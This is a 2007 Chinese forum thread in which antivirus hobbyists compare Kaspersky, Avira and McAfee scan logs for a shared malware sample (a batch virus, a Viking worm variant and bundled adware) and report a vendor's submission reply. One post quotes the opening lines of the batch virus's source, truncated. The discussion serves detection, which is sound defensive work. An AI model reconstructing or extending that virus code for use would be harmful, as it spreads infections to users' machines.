几个星期了MKF还查不出这病毒！这是我上次发布过的杀病毒的病毒完整板

qiqi00612

原帖由 小邪邪 于 2007-5-17 00:16 发表
@echo off
setlocal ENABLEDELAYEDEXPANSION ENABLEEXTENSIONS
cd /d "%~dp0"
if /i "%cd%"=="%~d0\" (explorer.exe "%~d0")
set v=01
set "endf=%systemdrive%\8bye.txt"
call:ie s.vbe
echo.Wscript.s ...

....那是什么。。。

wangjay1980

deleted: adware not-a-virus:AdWare.Win32.NewDotNet        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0017.BIN
deleted: riskware not-a-virus:AdTool.Win32.WhenU.a        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0019.BIN
deleted: adware not-a-virus:AdWare.Win32.Relevant.a        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0024.BIN
deleted: adware not-a-virus:AdWare.Win32.WebSearch.aj        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\ebayshop.exe/EbayShop\EbayShopSetup.exe
disinfected: virus Worm.Win32.Viking.jl        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\eyviewer.exe
deleted: adware not-a-virus:AdWare.Win32.Comet.bb        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\horoscopes.exe//data0011
deleted: adware not-a-virus:AdWare.Win32.Comet.be        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\horoscopes.exe//data0012
deleted: adware not-a-virus:AdWare.Win32.Beginto.f        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\searchtool.dll
deleted: adware not-a-virus:AdWare.Win32.Comet.be        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\setup.exe
deleted: adware not-a-virus:AdWare.Win32.SafeSurfing.aa        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\slimjunn.exe
deleted: virus Virus.BAT.Agent.b        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\u.bat

qiqi00612

原帖由 wangjay1980 于 2007-5-17 00:33 发表
detected: virus Virus.BAT.Agent.b        File: C:\Documents and Settings\Owner\×ÀÃæ\u.rar/u.bat

卡吧报的。。。。
已删除: 广告程序 not-a-virus:AdWare.Win32.NewDotNet 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0017.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.Relevant.a 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0024.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.WebSearch.aj 文件: F:\桌面\Upang\Upang\viurs\ebayshop.exe/EbayShop\EbayShopSetup.exe
已清除: 病毒 Worm.Win32.Viking.jl 文件: F:\桌面\Upang\Upang\viurs\eyviewer.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.bb 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0011
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0012
已删除: 广告程序 not-a-virus:AdWare.Win32.Beginto.f 文件: F:\桌面\Upang\Upang\viurs\searchtool.dll
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\setup.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.SafeSurfing.aa 文件: F:\桌面\Upang\Upang\viurs\slimjunn.exe
已删除: 病毒 Virus.BAT.Agent.b 文件: F:\桌面\Upang\Upang\viurs\u.bat
其中那个vikinng.jlMKF到现在好像还查不到。。。


PS：这个贴不算数。。。明明出错了还可以发的出来！

[ 本帖最后由 qiqi00612 于 2007-5-17 00:48 编辑 ]

qiqi00612

原帖由 wangjay1980 于 2007-5-17 00:33 发表
detected: virus Virus.BAT.Agent.b        File: C:\Documents and Settings\Owner\×ÀÃæ\u.rar/u.bat

这是卡吧查出来的。其中有个viking.jl这个MKF查不出来中了的人就不好玩了。。。。
8bye.txt
AUTOEXEC.bat
autorun.inf
u.vbs
eyviewer.exe
desktop.ini
以上的卡吧不报！！！
已删除: 广告程序 not-a-virus:AdWare.Win32.NewDotNet 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0017.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.Relevant.a 文件: F:\桌面\Upang\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropper//WISE0024.BIN
已删除: 广告程序 not-a-virus:AdWare.Win32.WebSearch.aj 文件: F:\桌面\Upang\Upang\viurs\ebayshop.exe/EbayShop\EbayShopSetup.exe
已清除: 病毒 Worm.Win32.Viking.jl 文件: F:\桌面\Upang\Upang\viurs\eyviewer.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.bb 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0011
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\horoscopes.exe//data0012
已删除: 广告程序 not-a-virus:AdWare.Win32.Beginto.f 文件: F:\桌面\Upang\Upang\viurs\searchtool.dll
已删除: 广告程序 not-a-virus:AdWare.Win32.Comet.be 文件: F:\桌面\Upang\Upang\viurs\setup.exe
已删除: 广告程序 not-a-virus:AdWare.Win32.SafeSurfing.aa 文件: F:\桌面\Upang\Upang\viurs\slimjunn.exe
已删除: 病毒 Virus.BAT.Agent.b 文件: F:\桌面\Upang\Upang\viurs\u.bat

qiqi00612

原帖由 wangjay1980 于 2007-5-17 00:39 发表
deleted: adware not-a-virus:AdWare.Win32.NewDotNet        File: E:\Ñù±¾\н¨Îļþ¼Ð (2)\Upang\viurs\angelinajoliedt.exe//WiseSFX Dropp ...

你是用什么杀软查的？？？怎么乱码的？？？

zane_xzz

mcafee就是这个样子，磨洋工

qiqi00612

原帖由 zane_xzz 于 2007-5-17 00:54 发表
mcafee就是这个样子，磨洋工

同意!我去睡了,早天再看看能不能查出来吧!

playx

u.rar 上报...upang有报如下..不知有无漏抓再上报


小红伞
Start of the scan: 2007年5月17日 星期四  05:03

Starting the file scan:

Begin scan in 'C:\download\Upang'
C:\download\Upang\viurs\eyviewer.exe
      [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
      [INFO]      A backup was created as '46c171fe.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
C:\download\Upang\viurs\horoscopes.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      A backup was created as '46bd71f4.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
C:\download\Upang\viurs\setup.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      A backup was created as '46bf71ea.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
C:\download\Upang\viurs\u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      A backup was created as '46ad71b3.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!

[ 本帖最后由 playx 于 2007-5-17 05:07 编辑 ]

mofunzone

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\u'
C:\Documents and Settings\morgan\My Documents\u\
  u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      The file was deleted!
Begin scan in 'C:\Documents and Settings\morgan\My Documents\viurs'
C:\Documents and Settings\morgan\My Documents\viurs\
  8bye.txt
  angelinajoliedt.exe
  AUTOEXEC.BAT
  autorun.inf
  desktop.ini
  ebayshop.exe
    [0] Archive type: RAR SFX (self extracting)
    --> EbayShop\ebay.ico
    --> EbayShop\EbayShop.exe
    --> EbayShop\EbayShopSetup.exe
        [DETECTION] Contains signature of the Ad- or Spyware ADSPY/WebSearch.AJ.4
        [WARNING]   Infected files in archives cannot be repaired!
    --> EbayShop\EbayShopUnwise.exe
    --> EbayShop\setup.ini
        [INFO]      The file was deleted!
  eyviewer.exe
      [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
      [INFO]      The file was deleted!
  horoscopes.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      The file was deleted!
  searchtool.dll
      [DETECTION] Contains signature of the Ad- or Spyware ADSPY/SmartShopper
      [INFO]      The file was deleted!
  setup.exe
      [DETECTION] Contains signature of the dropper DR/Comet.BB.5
      [INFO]      The file was deleted!
  slimjunn.exe
      [DETECTION] Contains signature of the Ad- or Spyware ADSPY/SafeSurfing.AA
      [INFO]      The file was deleted!
  u.bat
      [DETECTION] Contains signature of the batch virus BAT/VB.A
      [INFO]      The file was deleted!
  u.vbe


End of the scan: 2007年5月16日  15:22
Used time: 00:11 min

The scan has been done completely.

      2 Scanning directories
     19 Files were scanned
      8 viruses and/or unwanted programs were found
      0 classified as suspicious:
      8 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
     11 Files not concerned
      1 Archives were scanned
      1 Warnings
      0 Notes
      0 Hidden objects were found

playx

上报后回覆..



We have analyzed your submission.  The following is a report of our
findings for each file you have submitted:

filename:  u.rar
machine: Machine
result: See the developer notes

filename: u.bat
machine: Machine
result: This file is detected as W32.Uisgon.B.  

Developer notes:
u.rar is an infected container file of type  RAR
u.bat is non-repairable threat. Please delete this file and replace it
if necessary. Please follow the instruction at the end of this email
message to install the latest available definitions.  This file is
contained by   u.rar

[ 本帖最后由 playx 于 2007-5-17 16:39 编辑 ]